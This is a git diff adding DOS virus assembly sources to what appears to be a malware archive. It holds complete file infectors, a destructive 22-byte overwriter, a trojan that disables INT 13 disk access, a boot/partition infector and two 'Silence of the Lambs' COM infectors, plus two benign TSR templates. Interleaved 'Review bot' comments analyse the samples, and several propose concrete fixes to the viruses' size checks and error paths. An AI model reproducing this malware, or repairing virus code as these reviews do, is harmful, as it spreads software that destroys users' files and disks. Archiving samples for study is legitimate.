push cx + push ds + push dx + + mov ax,4301 + xor cx,cx + call callint21 + + mov ax,3d02 + call callint21 + jc exitnoclose + xchg ax,bx + + mov ax,5700 + int 21 + push cx + push dx + + mov ah,3f + mov cx,18 + push cs + pop ds + push cs + pop es + mov dx,offset readbuffer + mov si,dx + call callint21 + jc already_infected + + mov di,offset writebuffer + mov cx,18/2 + + push si + push di + + rep movsw + + pop di + pop si + + mov ax,4202 + xor cx,cx + cwd + int 21 + + cmp word ptr [di],'ZM' + jnz infectCOM + +infectEXE: + cmp readbuffer+10,EXE_ID +go_already_infected: + jz already_infected + + mov ds:writebuffer+4,ax + mov ds:writebuffer+2,dx + + mov cx,10 + div cx + + sub ax,ds:writebuffer+8 + + mov ds:writebuffer+14,dx + mov ds:writebuffer+16,ax + + xchg cx,dx + + mov ds:writebuffer+0e,ax + mov ds:writebuffer+10,EXE_ID + + mov al,10b + jmp finishinfect + +infectCOM: ; si = readbuffer, di = writebuffer + push ax + + mov cx,4 + xor dx,dx +check_infection_loop: + lodsb + add dl,al + loop check_infection_loop + + pop ax + + or dl,dl + jz go_already_infected + + mov dx,18 + cmp ax,dx + jnb no_fixup_com + + mov ax,4200 + xor cx,cx + int 21 +no_fixup_com: + mov cx,ax + inc ch ; add cx,100 + sub ax,3 + push ax + mov al,0e9 + stosb + pop ax + stosw + add al,ah + add al,0e9 + neg al + stosb + + mov al,11b +finishinfect: + cbw +; ax = bitmask +; bx = start decrypt in carrier file +; cx = encrypt length +; dx = start encrypt in virus +; si = buffer to put decryption routine +; di = buffer to put encryption routine + push bx + + xchg cx,bx + + xor si,si + mov di,offset copyvirus + mov cx,(heap-entry+1)/2 + rep movsw + + push ax + call rnd_init_seed + pop ax + + mov dx,offset copyvirus + mov cx,viruslength + mov si,offset _decryptbuffer + mov di,offset _encryptbuffer + call dame + + push cx + + cmp ds:writebuffer,'ZM' + jnz no_fix_header + + mov dx,ds:writebuffer+2 + mov ax,ds:writebuffer+4 + add cx,viruslength + add ax,cx + adc dx,0 + mov cx,200 + div cx + or dx,dx + jz nohiccup 
+ inc ax +nohiccup: + mov ds:writebuffer+4,ax + mov ds:writebuffer+2,dx +no_fix_header: + call di + pop cx + + pop bx + + mov ah,40 + mov dx,offset _decryptbuffer + call callint21 + + mov ah,40 + mov cx,viruslength + mov dx,offset copyvirus + call callint21 + + mov ax,4200 + xor cx,cx + cwd + int 21 + + mov ah,40 + mov cx,18 + mov dx,offset writebuffer + call callint21 + jmp already_infected + +vars = 0 +include dame.asm + +heap: +vars = 1 +include dame.asm + +writebuffer dw 0c dup (?) +_encryptbuffer: db 80 dup (?) +_decryptbuffer: db 180 dup (?) +copyvirus db viruslength dup (?) + db 20 dup (?) +endvirus: + +end entry + diff --git a/MSDOS/Virus.MSDOS.Unknown.triv22.asm b/MSDOS/Virus.MSDOS.Unknown.triv22.asm new file mode 100644 index 00000000..e2b62f29 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.triv22.asm @@ -0,0 +1,17 @@ +;22 Byte Trivial Virus +;Use WASM to assemble + + org 100h + + db '*.*',0 + + mov ah,4eh +Again + mov dx,si + int 21h + mov ah,3ch + mov dx,9eh + int 21h + xchg bx,ax + mov ah,40h + jmps Again diff --git a/MSDOS/Virus.MSDOS.Unknown.trojan.asm b/MSDOS/Virus.MSDOS.Unknown.trojan.asm new file mode 100644 index 00000000..3e2b9c00 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trojan.asm 
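Review bot: The payload path at `trigger:` is undocumented: it scans every segment from 0 to 0A000h for the 16 bytes in `checkstub`, patches the matching segment's byte at offset 73h to 0CBh and far-calls into it via the `db 09a` / `patch dw ?` sequence, and nothing in the file says what resident program those bytes belong to, so the sample cannot be classified from the listing alone. A comment above `checkstub` naming what the stub identifies, and what the `ax=0cf0` / `bx='DA'` int 21 probe answered with `bx='GH'` is testing for, is what I would add; I cannot identify it from the bytes shown. Separately, `include dame.asm` appears twice (under `vars = 0` and `vars = 1`) and that file is not part of this commit, so as archived the listing is not self-contained and the `dame` routine called from `finishinfect` cannot be reviewed here; a header note recording the missing dependency would save the next analyst a search.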
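Review bot: The two-line header understates what this sample does: after the findfirst it issues `mov ah,3ch` with `dx,9eh` (the name in the default DTA) and writes to the returned handle, so every file matching `*.*` is created/truncated in place; this is a destructive overwriter and affected files are not recoverable by disinfection. I would extend the header with `; overwriting (non-restoring) infector: each matched file is truncated, original contents are lost` so a triage note does not promise a cleanup that is not possible.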
@@ -0,0 +1,69 @@ +;***************************************************************************** +; The High Evolutionary's INT 13 Trojan +;***************************************************************************** +; +; Development Notes: +; (Dec.1O.9O) +; +; Well, I was screwing around with TSR's the other day and I got the idea, +; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR +; program answers my query. +; +; It's really a big mess. You can't access any file on the directory, you can't +; DIR anything, can't TYPE anything, I think the only thing you can do is +; DEL which is handled by INT 21. +; +; Well, in any event, put this routine in any nifty source code you see and +; then compile it... It will confuse the fuck out of any 100% "Lame" user. +; +; Have fun... +; +; -= The High Evolutionary =- +; +;***************************************************************************** +; Copyright (C) 199O by The RABID Nat'nl Development Corp. +;***************************************************************************** + + code segment + assume cs:code,ds:code + org 100h + +start: jmp init_vectors + + mesg db 'INT 13 Trojan by The High Evolutionary' + crud db '(C) 199O by RABID Nat''nl Development Corp.' + crap dd ? + +program proc far + + assume cs:code,ds:nothing + + mov ax,4c00h ; Terminate Program with exit code 00 + int 21h ; Call DOS + +program endp + +; +; The TSR initialization shit happens here... +; + +init_vectors proc near + + assume cs:code,ds:code + + mov ah,35h ; ask for int vector + mov al,13h ; intercept INT 13 + int 21h ; Call DOS + mov word ptr crap,bx + mov word ptr crap[2],es + mov ah,25h ; set int value + mov al,13h ; set for INT 13 + mov dx,offset program ; Tell the TSR what to do when accessed + int 21h ; Call DOS + mov dx,offset init_vectors ; Load in this segment into DX + int 27h ; Make the sucker in DX TSR... + +init_vectors endp + + code ends +end start 
diff --git a/MSDOS/Virus.MSDOS.Unknown.tsd1.asm b/MSDOS/Virus.MSDOS.Unknown.tsd1.asm new file mode 100644 index 00000000..10cef8b1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsd1.asm 
@@ -0,0 +1,260 @@ +; Senast ndrad 891213. +; +; Lgger gamla bootsectorn p sida 1, spr 0, sector 3. +; sida 0, spr 0, sector 7 p HD. + + +Code Segment + Assume cs:Code + Org 0000h + +Main Proc Far + db 0EAh,05h,00h,0C0h,07h + + jmp Near Ptr Init ; Hoppa frbi variabler och nya int13h + + +; Variabler + +Old13h dd 0 ; Gamla vectorn till diskfunktionerna. + +TmpVec dd 0 ; Temporr vec. vid ndring av int 13. + +BootPek dw 0003h,0100h + +; Slut p variabler + + + +Int13h Proc Near + push ds + push ax + push bx + + cmp dl,00h ; Drive A + jne Exit + + cmp ah,02h + jb Exit + cmp ah,04h + ja Exit ; Kolla s att func. 2-4 + + sub ax,ax + mov ds,ax + mov bx,043Fh ; Motor status byte. + test Byte Ptr [bx],01h ; Testa om motorn i A: r p.. + jnz Exit ; Nej,hoppa till gamla int 13h + + call Smitta + +Exit: pop bx + pop ax + pop ds + jmp [Old13h] + + +Smitta Proc Near + push cx + push dx + push si + push di + push es + + push cs + pop es + push cs + pop ds + + mov si,0004h ; Max antal frsk. + +Retry: mov ax,0201h ; Ls en sector + mov bx,0200h ; Ls hit. + mov cx,0001h ; Spr 0 Sector 1 + sub dx,dx ; Sida 0 Drive 0 + pushf + call [Old13h] ; Ls in booten. + + jnc OK + + dec si + jz Slut ; Hoppa ur om fel. + jmp Retry ; Frsk max 4 gnger. + + +OK: mov si,0200h + sub di,di + cld + lodsw + cmp ax,[di] + jne L2 + lodsw + cmp ax,[di+2] + jne L2 + jmp Slut + +L2: mov ax,0301h ; Skriv en sector. + mov bx,0200h + mov cx,0003h ; Spr 0 Sector 3 + mov dx,0100h ; Sida 1 Drive 0 + pushf + call [Old13h] ; Flytta boot sectorn. + + mov ax,0301h + sub bx,bx + mov cx,0001h + sub dx,dx + pushf + call [Old13h] ; Skriv ner viruset till booten. + +Slut: pop es + pop di + pop si + pop dx + pop cx + ret +Smitta Endp +Int13h Endp + +Init: sub ax,ax + mov ds,ax ; Nollar ds fr att ndra vect. + + cli + mov ss,ax + mov sp,7C00h + sti ; Stter upp en ny stack. + + push cs + pop es + mov di,Offset Old13h + mov si,004Ch + mov cx,0004h + cld + rep movsb ; Flytta int 13h vectorn. 
+ + mov bx,0413h + mov ax,[bx] ; Minnesstorleken till ax. + dec ax + dec ax + mov [bx],ax ; Reservera plats fr viruset. + + mov cl,06h + shl ax,cl + mov es,ax ; Omvandla till segment addres. + + mov Word Ptr TmpVec,Offset Int13h + mov Word Ptr TmpVec+2,es + push es + sub ax,ax + mov es,ax + push cs + pop ds + mov si,Offset TmpVec + mov di,004Ch + mov cx,0004h + rep movsb + pop es + + sub si,si + mov di,si + mov cx,0200h ; Hela viruset + lite till. + rep movsb + + mov ax,Offset Here + push es + push ax + ret ; Hoppa till viruset. + +Here: sub ax,ax + int 13h ; terstll driven + + sub ax,ax + mov es,ax + mov ax,0201h ; Ls en sector funk. + mov bx,7C00h ; Hit laddas booten normalt. + mov cx,BootPek + mov dx,BootPek+2 + int 13h + + push cs + pop es + mov ax,0201h + mov bx,0200h + mov cx,0001h + mov dx,0080h + int 13h ; Ls in partions tabellen. + jc Over + push cs + pop ds + mov si,0200h + sub di,di + lodsw + cmp ax,[di] ; Kolla om den r smittad. + jne HdInf + lodsw + cmp ax,[di+2] + jne HdInf + +Over: mov BootPek,0003h + mov BootPek+2,0100h + sub bx,bx + push bx + mov bx,7C00h + push bx + ret ; Kr den gamla booten. + +HdInf: mov BootPek,0007h + mov BootPek+2,0080h + + mov ax,0301h + mov bx,0200h + mov cx,0007h + mov dx,0080h + int 13h ; Flytta orgin. part.tabellen. + jc Over + + push cs + pop ds + push cs + pop es + mov si,03BEh + mov di,01BEh + mov cx,0042h + cld + rep movsb ; Kopiera part. data till viruset. + + mov ax,0301h + sub bx,bx + mov cx,0001h + mov dx,0080h + int 13h ; Skriv viruset till part. tabellen. + + + sub ax,ax + mov es,ax ; Kolla om msg:et ska skrivas ut. + test Byte Ptr es:[046Ch],07h + jnz HdInf1 + + mov si,Offset Txt ; Detta utfrs bara om man bootar frn + cld ; diskett. +Foo1: lodsb + cmp al,00h + je HdInf1 + mov ah,0Eh + sub bx,bx + int 10h + jmp Foo1 + +HdInf1: jmp Over + + +Slutet Label Byte ; Anvnds fr att veta var slutet r. 
+ + +Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h + + +Main Endp +Code Ends + End + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm b/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm new file mode 100644 index 00000000..286edf11 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm 
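Review bot: In `Smitta` the original floppy boot sector is parked with `mov cx,0003h / mov dx,0100h` (head 1, track 0, sector 3) with no check that the sector is free; by my count of the standard DOS floppy layouts (360K through 1.44M) that physical sector lies inside the root directory, so every infection silently overwrites a sector of directory entries, and a comment stating that trade-off belongs on the `L2:` write. The infection test compares only the first four bytes of the read sector against the virus's own far jump (`lodsw / cmp ax,[di]` twice), so any boot sector that happens to begin with the same `EA 05 00 C0` bytes is treated as already infected. The Swedish comments should be translated, and the one on `jnz Exit` is inverted — the branch is taken when the A: motor bit at 0040:003F IS set, i.e. the infection only runs while the drive is idle: `jnz Exit ; motor already running -> pass straight to the old INT 13h`.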
@@ -0,0 +1,166 @@ +; Silence of The Lambs v1.0 +; (c) The Chronomancer of Demoralized Youth 1992 +; +; First version : Thursday 27th of Febuary - 01:50 CET. +; + +org 100h +jmp short dummy1 +db 'DY' +dummy1: + mov cx,(100h-80h)/2 ;save command line on stack + mov si,80h + save_parm: + push [si] + inc si + inc si + loop save_parm + + mov ah,4Eh + xor cx,cx + mov dx,offset file + int 21h + jc nomore +again: + cmp byte [9Eh],0FAh + jae more + call infect +more: + mov ah,4Fh + int 21h + jnc again +nomore: + mov cx,(100h-80h)/2 + mov si,0FEh +rest_parm: + pop [si] + dec si + dec si + loop rest_parm + + mov bx,0000h +eof equ $-2 + jmp bx + +file db '*.COM',0 + +infect: + mov bx,cs + mov si,cs + dec si + mov ds,si + cmp byte[0],'Z' + je ok_mark + jmp back2 +ok_mark: + sub word [0003h],pgfsize + jnc ok_mark2 + jmp back +ok_mark2: + mov ax,[0012h] + sub ax,pgfsize + push ax + + mov ds,bx + mov ax,4301h + xor cx,cx + mov dx,80h+1Eh + int 21h + + mov ax,3D02h + int 21h + xchg bx,ax + + pop ds + push ds + mov cx,total + xor dx,dx + mov ah,3Fh + int 21h + + cmp byte [0],'M' ;exe ? + je close + cmp byte [0],'Z' ;exe ? + je close + cmp word [2],'YD' ;allready infected? + je close + + xor cx,cx + xor dx,dx + push cx + push dx + mov ax,4202h + int 21h + + add ax,total+100h + mov cs:word [00FEh],ax + + mov ah,40h + mov cx,total + xor dx,dx + int 21h + + push cs + pop ds + + mov ah,40h + mov cx,applen + mov dx,offset append + int 21h + + mov ax,4200h + pop dx + pop cx + int 21h + + push [eof] + mov ax,word [00FEh] + mov [eof],ax + + mov ah,40h + mov dx,100h + mov cx,total + int 21h + + pop [eof] +close: + mov ah,3Eh + int 21h +back: + pop ds ;(mov ds,si) + add word [0003h],pgfsize +back2: + push cs + pop ds + ret + +append: +call $+3 +pop si +sub si,3+total +mov di,100h +mov cx,total +rep movsb +mov ax,100h +push ax +ret +applen equ $-offset append + +total equ $-100h ;size +pgfsize equ ($-100h)/16+2 ;paragraphs needed + + + + + + + + + + + + + + + + \ No newline at end of file 
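Review bot: The size guard `cmp byte [9Eh],0FAh / jae more` does not look at the file size: with the DTA at 80h the size dword sits at 9Ah–9Dh and 9Eh is the first character of the found filename, so the compare is against an ASCII byte, never triggers, and `infect` runs for every `*.COM` found. Because `add ax,total+100h` then uses only the low word of the EOF offset, a large host gets a truncated entry offset patched into `eof` and is destroyed; the intended test was presumably `cmp byte [9Bh],0FAh` (high byte of the low size word), mirroring the `cmp ah,0FAh` check v2.0 applies to the lseek result. The open at `mov ax,3D02h / int 21h / xchg bx,ax` also has no carry check, so on failure BX holds the DOS error code and is then used as the handle for the read, the seeks, both writes and the close.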
diff --git a/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm b/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm new file mode 100644 index 00000000..6204adfc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm 
@@ -0,0 +1,322 @@ +; Silence of The Lambs v2.0 +; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992 +; +; THIS FILE IS FOR EDUCATION PURPOSES ONLY! +; PERMISSION IS GRANTED TO SPREAD THE SOURCE +; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE +; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE +; THE ORIGINAL SOURCE. +; +; Assemble With A86 +; + +org 100h +jmp short dummy1 +db 'DY' +dummy1: + mov cx,length + mov si,offset enc_start + mov ah,0 +enc_key equ $-1 +dummy2: + sub byte [si],ah + inc si + add ah,0 +enc_add equ $-1 + loop dummy2 +enc_start: + mov ah,2Dh + mov ch,0FFh + mov dx,cx + int 21h + cmp al,0FFh + jne nomore + + mov ax,cs + dec ax + mov ds,ax + cmp byte [0],'Z' + jne nomore + + mov ax,word [3] + sub ax,pgfsize + jc nomore + sub word [3],pgfsize + sub word [12h],pgfsize + + mov es,word [12h] + mov si,110h + mov di,100h + mov cx,total + cld + rep movsb + + xor ax,ax + mov ds,ax + mov si,84h + mov di,old21 + movsw + movsw + + cli + mov word [84h+2],es + mov word [84h],offset ni21 + sti + +nomore: + push cs + push cs + pop es + pop ds + + mov bx,0000h ;return control to the +eof equ $-2 ;end user + jmp bx + +xclose: jmp close + +infect: + push cs + pop ds + push cs + pop es + + db 0E4h,40h + mov byte [enc_key],al + + mov ax,4300h ;use CHMOD to get file attr + xor dx,dx + int 21h + + mov [0F0h],cx ;store attr in PSP + + mov ax,4301h ;clear file attr with CHMOD + xor cx,cx + int 21h + + mov ax,3D02h ;open file for read / write + int 21h + xchg bx,ax + lahf + push ax + mov ax,5700h ;get file date & time + int 21h + + mov [0F2h],cx + mov [0F4h],dx + pop ax + sahf + jc xclose + + mov ah,3Fh ;read from file + mov cx,total + mov dx,old + int 21h + + cmp byte [old+0],'M' ;exe MZ ? + je xclose + cmp byte [old+0],'Z' ;exe ZM ? + je xclose + cmp word [old+2],'YD' ;allready infected? 
+ je xclose + + mov ax,4202h ;lseek to EOF + xor cx,cx + xor dx,dx + int 21h + + cmp ah,0FAh + jae xclose + cmp ah,4 + jb xclose + + add ax,total+100h + mov word [00F6h],ax + + mov ah,40h ;write to EOF + mov cx,total + mov dx,old + +push cx +mov al,byte [enc_key] +mov si,dx +enc_app: +xor byte [si],al +inc si +loop enc_app +pop cx + + int 21h + + mov ah,40h ;write to EOF + mov cx,applen + mov dx,offset append + int 21h + + mov ax,4200h ;lseek to beginning of file + xor cx,cx + xor dx,dx + int 21h + + push [eof] + mov ax,word [00F6h] + mov [eof],ax + + mov ah,byte [enc_key] + db 0E4h,40h + mov byte [enc_add],al + mov dl,al + + mov si,100h + mov di,old + + cld + mov cx,offset enc_start-100h + rep movsb + + mov cx,length +enc: + lodsb + add al,ah + stosb + add ah,dl + loop enc + + mov ah,40h ;write viral code + mov dx,old + mov cx,total + int 21h + + pop [eof] +close: + mov ax,5701h + mov cx,[00F2h] + mov dx,[00F4h] + int 21h + + mov ah,3Eh ;close file + int 21h + + mov ax,4301h + mov cx,[00F0h] + xor dx,dx + int 21h + ret + +append: + call $+3 ;replace org bytes + pop si + sub si,3+total + mov di,100h + mov cx,total + mov ah,byte [enc_key] +append_enc: + lodsb + xor al,ah + stosb + loop append_enc + + mov ax,100h ;return IP to 100h when done + push ax + + sub ax,ax ;zero regs + xor bx,bx + and cx,cx + sub dx,dx + xor si,si + and di,di + sub bp,bp + + ret +applen equ $-offset append + +ni21: + pushf + cmp ah,2Dh + jne Not_Time + cmp ch,0FFh + jne Not_Time + cmp ch,dh + jne Not_time + + mov Al,0 + popf + iret +Not_Time: + cld + push ax + push bx + push cx + push dx + push si + push di + push bp + push es + push ds + +; cmp ah,41h +; jne Not_Parse +; mov ah,3Ch +; cli +; add sp,18 +; sti +; popf +; jmp old21-1 + +Not_Parse: + cmp ax,4B00h + jne Not_Exec + + mov si,dx + push cs + pop es + xor di,di + mov cx,128 + rep movsb + + mov ax,3524h + int 21h + push es + push bx + + push cs + pop ds + + mov ax,2524h + mov dx,offset ni24 + int 21h + + call infect + + pop dx + pop 
ds + mov ax,2524h + int 21h + +Not_Exec: + pop ds + pop es + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp far 0000:0000 +old21 equ $-4 + +ni24: mov al,0 + iret + +db 'The Silence Of The Lambs!$' + +total equ $-100h ;size +pgfsize equ (($*2)/16)+2 +length equ $-offset enc_start + +old equ $ + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsr.asm b/MSDOS/Virus.MSDOS.Unknown.tsr.asm new file mode 100644 index 00000000..5c4cd1e8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsr.asm 
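Review bot: In `infect` the `jc xclose` after the `mov ax,3D02h` open lands on `close:`, which still executes `mov ax,5701h` (set date/time) and `mov ah,3Eh` (close) with BX holding the DOS error code from the failed open rather than a handle — error 5 (access denied), for instance, would close handle 5 of the program that issued the EXEC. The failure path should skip straight to the attribute restore: `jc restore_attr` with a `restore_attr:` label placed immediately before `mov ax,4301h / mov cx,[00F0h]`. The `cmp ah,0FAh` / `cmp ah,4` size test that follows also inspects only the low word of the lseek result and ignores DX, so a non-MZ file of 64K or more passes and the `add ax,total+100h` entry offset wraps.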
@@ -0,0 +1,307 @@ + +; NOTE : This template is for .COM files only do not use for .EXE files!! + + +; +; +; +; Copyright 1986 by Dana Nowell - All rights reserved +; +; HISTORY: +; Version Date Name Description +; 1.0 11/10/86 dn first cut +; 1.01 11/21/86 dn Fixed memory allocation bug +; Added installation message +; + + +title TSR Template + + + + NULL equ 00h + BELL equ 07h ; bell character + BACKSPACE equ 08h ; backspace character + TAB equ 09h ; tab character + LF equ 0ah ; line feed + F_FEED equ 0ch ; form feed + CR equ 0dh ; carriage return + EOF equ 1ah ; ctrl z ( end of file ) + SPACE equ ' ' ; ascii space character + QUOTE equ '"' + +SIGNATURE1 equ 6144h ; used for already +SIGNATURE2 equ 616eh ; resident check + +DOS_INT equ 21h ; DOS function interrupt +DISP_CHAR equ 02h +GET_KEY equ 08h +DOS_SCR_MSG equ 09h +DOS_SET_INT equ 25h +DOS_RESIDENT equ 31h +DOS_GET_INT equ 35h +DOS_TERMINATE equ 4ch +DOS_STRING_TERM equ '$' + +; Interrupt vectors used + +HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now ) + +;------------------------------------------------------------------------------ +; +; MACRO SECTION +; +;------------------------------------------------------------------------------ + +Version_msg macro + jmp short copyright_end + +copyright_msg db CR, LF + db 'TSR Shell - Version 1.01', CR, LF + db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF + db 'May be distributed without license', CR, LF, '$' +copyright_end: + Msg copyright_msg + endm + + +Msg macro ptr + + push dx + push ax + + lea dx, ptr + mov ah, 09h + int 21h + + pop ax + pop dx + + endm + + + + + +com segment para public 'code' + assume cs:com, ds:com, es:com + +;------------------------------------------------------------------------------ +; +; note: The PSP occurs at the beginning of the code segment +; for all programs. In COM files the code seg = data seg +; +;------------------------------------------------------------------------------ + + org 0 + +psp_start dw ? 
; int 20h - possibly a block for unresolved + ; externals during link ? + +mem_size dw ? ; size of available memory in paragraphs +filler db ? ; reserved usually zero + +dos_call db ? ; call + dd ? ; address of dos function handler + +term_vector dd ? ; address of dos terminate routine +break_vector dd ? ; address of dos break routine +error_vector dd ? ; address of dos error routine +dos_reserved db 2 dup(?); reserved by dos +dos_handles db 20 dup(?) ; file handle array +environ_ptr dw ? ; seg of dos environment ( offset = 0 ) +dos_work db 34 dup(?) ; dos work area + +int_21h db ? ; int + db ? ; 21h + db ? ; retf ( return far ) + +reserved dw ? ; reserved by dos +fcb1_ext db 7 dup(?) ; fcb # 1 extension +fcb1 db 9 dup(?) ; fcb #1 +fcb2_ext db 7 dup(?) ; fcb # 2 extension +fcb2 db 20 dup(?) ; fcb #2 + +; +; disk transfer area ( dta ) and parameter block occupy the same space +; +; +;dta db 128 dup(?) ; disk transfer area + + + +param_len db ? ; length of parameter string ( excludes CR ) +parameters db 127 dup(?) ; parameters + +;------------------------------------------------------------------------------ +; +; Note on standard fcb structure : +; +; The standard FCB is larger than the size reserved in the PSP if you +; intend to use to FCB data from the PSP move it to a different location. +; +; +; STANDARD STRUCTURE OF A FILE CONTROL BLOCK +; +; +; extension : +; offset length description +; -7 1 extension active flag ( 0ffh = active ) +; -6 5 normally unused should be zeros +; -1 1 file attribute when extension is active +; 1 . . . . . . . 1 read-only +; 2 . . . . . . 1 . hidden +; 4 . . . . . 1 . . system +; 8 . . . . 1 . . . volume label +; 16 . . . 1 . . . . subdirectory +; 32 . . 1 . . . . . archive +; 64 . 1 . . . . . . unused +; 128 1 . . . . . . . 
unused +; +; fcb : +; offset length description +; 0 1 special drive number ( 1 byte ) +; 0 = default +; 1 = a: +; 2 = b: etc +; 1 8 filename or device name +; 9 3 filename extension +; 12 2 current block number +; 14 2 record size +; 16 4 file size in bytes ( dos dir entry at open ) +; 20 2 file date ( bit coded as in dir ) +; 22 10 dos work area +; 32 1 current record number ( 0 - 127 ) +; 33 4 random record number +; +;------------------------------------------------------------------------------ + + + + org 100h ; required for COM file ( skips PSP ) + + +start: + jmp install ; install the demon + +;------------------------------------------------------------------- +; +; resident data structures go here +; +;------------------------------------------------------------------- + + old_int dd 0 ; original value of hooked interrupt + resident1 dw SIGNATURE1 + resident2 dw SIGNATURE2 + + +;------------------------------------------------------------------- +; +; new interrupt starts here +; +;------------------------------------------------------------------- + +new_int: + pushf + + sti ; must turn INT on if we're going to use them + +;------------------------------------------------------------------- +; +; be well behaved and pass control to original int +; +;------------------------------------------------------------------- + + popf + pushf + call dword ptr cs:old_int ; do old interrupt + + iret ; bye bye + +;------------------------------------------------------------------------------ +; +; INSTALLATION DATA STRUCTURES AND CODE GO HERE +; +; WARNING WARNING WARNING - this area does not exist after installation +; +;------------------------------------------------------------------------------ + +last_resident_byte db 0 ; last resident byte +resident_flag dw 0 ; am I already resident ? 
( 0 = NO ) + +install_msg db CR, LF, 'Installation Complete', CR, LF, '$' + +already_installed_msg db CR, LF + db 'Already Installed - Installation Aborted' + db CR, LF, '$' + +install proc near + + Version_msg + + + mov al, HOOK_INT ; int to hook + mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX + int DOS_INT ; do the int + lea si, old_int ; where to put old timer interrupt vector + mov [si], bx ; save the offset and segment + mov 2[si], es ; ( es also used in check resident ) + + call check_resident ; am I already resident ? + + cmp resident_flag, 0 + je not_resident + + Msg already_installed_msg + + mov ah, DOS_TERMINATE ; terminate & stay resident + mov al, 1 ; return value is 1 (already installed) + int DOS_INT ; bye-bye + +not_resident: + mov dx, offset new_int ; offset of new timer interrupt + mov al, HOOK_INT ; timer tick + mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX + int DOS_INT ; do the int + +; program terminate and stay resident + + Msg install_msg ; Display the installation message + + mov dx, offset last_resident_byte + + mov cl, 4 ; convert to paragraphs required to + shr dx, cl ; remain resident ( divide by 16 ) + inc dx ; allow for any remainder of division + + mov ah, DOS_RESIDENT ; terminate & stay resident + mov al, 0 ; return value is 0 (good return) + int DOS_INT ; bye-bye + +install endp + + +; +; Check resident procedure +; requires es register to contain the segment address of +; the current location for the interrupt being hooked. +; use the DOS function 35h to obtain this information. +; + +check_resident proc near + + cmp es:resident1, SIGNATURE1 + jne not_res + cmp es:resident2, SIGNATURE2 + jne not_res + + mov resident_flag, 1 + +not_res: + ret + +check_resident endp + +com ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsres.asm b/MSDOS/Virus.MSDOS.Unknown.tsres.asm new file mode 100644 index 00000000..6a7125f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsres.asm 
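Review bot: The `pushf / sti / popf` sequence at the top of `new_int` has no effect: the `popf` restores the flags captured on entry (IF is cleared by the interrupt itself) before any work runs, so the comment `must turn INT on if we're going to use them` describes something the handler does not do — either drop the three lines or put the resident work between the `sti` and the `popf`. Two comments are also inaccurate for a template others will copy: `mov ah, DOS_TERMINATE ; terminate & stay resident` on the already-installed path is a plain AH=4Ch exit and should read `; plain terminate - NOT resident (already installed)`, and the exit code 1 returned there is documented nowhere in the header. Finally, `check_resident` reads `es:resident1` at the template's own offsets inside whatever segment currently owns INT 1Ch, which is only a valid probe while every installed copy keeps the same layout; a note to that effect on the procedure header would save a future copier from moving the signature words.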
@@ -0,0 +1,296 @@ +;************************************************************* +;** Terminate-but-Stay-Resident ** +;** Original from the "Programmer's Journal" ** +;** Modified by Alroger L. Gomes Jr. ** +;** Any comments/question send message for "Roger Gomes" ** +;** on the PDSE BBS (408)735-7190. Have Fun! ** +;************************************************************* +; Insert you program on line # 157. + +Delay_Count Equ 36 ;36 ticks=approx. 2 seconds + +; Locations of BIOS Data needed by the resident program + +Bios_Data Segment at 40h + Org 17h + Kbd_Status dw ? + Org 6Ch + Low_Timer dw ? +Bios_Data EndS + + +Code Segment + Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing + Org 100h +Entry_Point: + Jmp Install + + Hot_Keys dw 01010B + This_Time dw ? + Trig_Time dw ? + Dos_Busy Label dword + Dos_Busy_Off dw ? + Dos_Busy_Seg dw ? + Criterr_Flag db ? + +Already8 db 0 +MenuON db 0 + + +;*** Replacement for Int 24h - critical Dos Error *** +Diverted_Int24: + Mov Cs:Criterr_Flag,1 + Xor Al,Al + Iret + + Int_24_Vect Label dword + Int_24_Off dw ? + Int_24_Seg dw ? + +;***** ID CODE ***** +Res_ID1 dw 'Al' +Res_ID2 dw 'ro' +Res_ID3 dw 'ge' +;******************* + +;*** Replacement for Int 8 - Timer hardware Interrupt *** +Diverted_Int8: + Pushf + Call_Int8 db 09Ah + Int_8_Vect Label dword + Int_8_Off dw ? + Int_8_Seg dw ? + + Cmp Cs:MenuOn,0 + Je MenuNOT + Iret +MenuNOT: + Mov Cs:MenuOn,1 + Push Ds + Push Bx + Lds Bx,Cs:Dos_Busy + Cmp Byte Ptr [Bx],0 + Pop Bx + Pop Ds + Mov Cs:MenuOn,0 + Jz Get_Bios_Data +Dos_is_Busy: + Iret + +;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O *** +Diverted_Int28: + Pushf + Call_Int28 db 09Ah + Int_28_Vec Label dword + Int_28_Off dw ? + Int_28_Seg dw ? 
